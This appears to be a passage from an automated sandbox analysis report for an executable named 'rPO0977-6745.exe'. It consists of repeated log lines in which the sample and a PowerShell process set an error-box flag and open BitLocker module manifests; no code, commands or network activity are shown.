Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
